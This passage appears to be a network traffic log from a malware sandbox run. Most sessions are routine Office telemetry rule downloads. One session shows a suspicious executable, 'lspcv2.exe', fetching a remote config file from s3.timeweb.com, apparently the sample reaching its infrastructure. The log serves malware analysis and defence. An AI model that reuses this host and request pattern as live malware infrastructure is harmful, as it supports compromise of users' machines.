                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                  ETag: "0x8DC582BB2BE84FD"
                                                                                                                  x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-16547b76f7fk9g8vhC1DFW825400000000pg000000008q43
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC | 475 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  88 | 192.168.2.4 | 49852 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:53 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 479
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                  ETag: "0x8DC582BB7D702D0"
                                                                                                                  x-ms-request-id: 87bd4a9e-701e-0021-04a0-343d45000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-1749fc9bdbddrtrhhC1DFWsq8000000002sg0000000046s5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC | 479 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  89 | 192.168.2.4 | 49855 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:53 UTC | 192 | OUT | GET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 448
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                  ETag: "0x8DC582BB389F49B"
                                                                                                                  x-ms-request-id: 09d319c7-501e-008c-1e01-36cd39000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-r178fb8d765n474shC1DFWge7g00000002k000000000cthp
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC | 448 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  90 | 192.168.2.4 | 49856 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:53 UTC | 192 | OUT | GET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 491
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B98B88612"
                                                                                                                  x-ms-request-id: d6de3b9d-801e-00a0-7812-362196000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-1749fc9bdbdmg6wshC1DFWu2bc00000002s00000000060e7
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC | 491 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  91 | 192.168.2.4 | 49859 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:54 UTC | 192 | OUT | GET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 416
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                  ETag: "0x8DC582BAEA4B445"
                                                                                                                  x-ms-request-id: 46e97820-b01e-0097-069a-364f33000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-r178fb8d765kzgrxhC1DFWrsuc00000002cg00000000f1pb
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  92 | 192.168.2.4 | 49860 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:54 UTC | 192 | OUT | GET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 479
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B989EE75B"
                                                                                                                  x-ms-request-id: a8f543db-f01e-003f-08a0-34d19d000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-r178fb8d765dbczshC1DFW33an00000002k00000000043ct
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  93 | 192.168.2.4 | 49861 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:54 UTC | 192 | OUT | GET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 415
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                  x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-16547b76f7f7lhvnhC1DFWa2k00000000kng00000000axb0
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  94 | 192.168.2.4 | 49862 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:54 UTC | 192 | OUT | GET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 471
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                  ETag: "0x8DC582B97E6FCDD"
                                                                                                                  x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-16547b76f7fj897nhC1DFWdwq40000000kp00000000043ps
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  95 | 192.168.2.4 | 49863 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:54 UTC | 192 | OUT | GET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                  ETag: "0x8DC582B9C710B28"
                                                                                                                  x-ms-request-id: f331b8e7-a01e-0070-470c-36573b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-1749fc9bdbdmg6wshC1DFWu2bc00000002r00000000094s3
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  96 | 192.168.2.4 | 49867 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:55 UTC | 192 | OUT | GET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 477
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                  ETag: "0x8DC582BA54DCC28"
                                                                                                                  x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-16547b76f7f67wxlhC1DFWah9w0000000kn000000000gzpn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  97 | 192.168.2.4 | 49871 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:55 UTC | 192 | OUT | GET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                  ETag: "0x8DC582BB650C2EC"
                                                                                                                  x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-16547b76f7frbg6bhC1DFWr5400000000kq0000000007d0n
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  98 | 192.168.2.4 | 49869 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:55 UTC | 192 | OUT | GET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 477
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                  ETag: "0x8DC582BA48B5BDD"
                                                                                                                  x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-16547b76f7f4k79zhC1DFWu9y00000000krg00000000equy
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  99 | 192.168.2.4 | 49868 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:55 UTC | 192 | OUT | GET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                  ETag: "0x8DC582BB7F164C3"
                                                                                                                  x-ms-request-id: 513eaac4-201e-0085-0178-3534e3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-r178fb8d765tq2dphC1DFW278s00000002dg00000000du68
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  100 | 192.168.2.4 | 49870 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:55 UTC | 192 | OUT | GET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                  ETag: "0x8DC582B9FF95F80"
                                                                                                                  x-ms-request-id: 842612a7-c01e-00a2-75a0-342327000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-r178fb8d765kzgrxhC1DFWrsuc00000002f000000000b3y8
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  101 | 192.168.2.4 | 49874 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:56 UTC | 192 | OUT | GET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                  ETag: "0x8DC582BB3EAF226"
                                                                                                                  x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-16547b76f7fj897nhC1DFWdwq40000000kn00000000072mt
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  102 | 192.168.2.4 | 49873 | 92.53.116.138 | 443 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:56 UTC | 208 | OUT | GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
                                                                                                                  User-Agent: ler8109.txt
                                                                                                                  Host: s3.timeweb.com
                                                                                                                  If-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMT
                                                                                                                  If-None-Match: "8cc325c4a72b846a690145124f81749a"
                                                                                                                  2024-11-14 14:00:56 UTC | 474 | IN | HTTP/1.1 304 Not Modified
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Connection: close
                                                                                                                  Etag: "8cc325c4a72b846a690145124f81749a"
                                                                                                                  X-Container-Storage-Policy-Index: 0
                                                                                                                  X-Container-Storage-Policy-Name: Policy-0
                                                                                                                  X-Krakend: Version 1.4.1
                                                                                                                  X-Krakend-Completed: false
                                                                                                                  Expires: Thu, 14 Nov 2024 14:01:26 GMT
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: *
                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                  Access-Control-Max-Age: 1728000


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  103 | 192.168.2.4 | 49877 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:56 UTC | 192 | OUT | GET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 470
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                  ETag: "0x8DC582BBB181F65"
                                                                                                                  x-ms-request-id: 5110c4ae-601e-0050-54a6-342c9c000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-r178fb8d765dbczshC1DFW33an00000002e000000000cfpf
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC | 470 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  104 | 192.168.2.4 | 49875 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:56 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 485
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                  ETag: "0x8DC582BB9769355"
                                                                                                                  x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                                                  x-ms-version: 2018-03-28
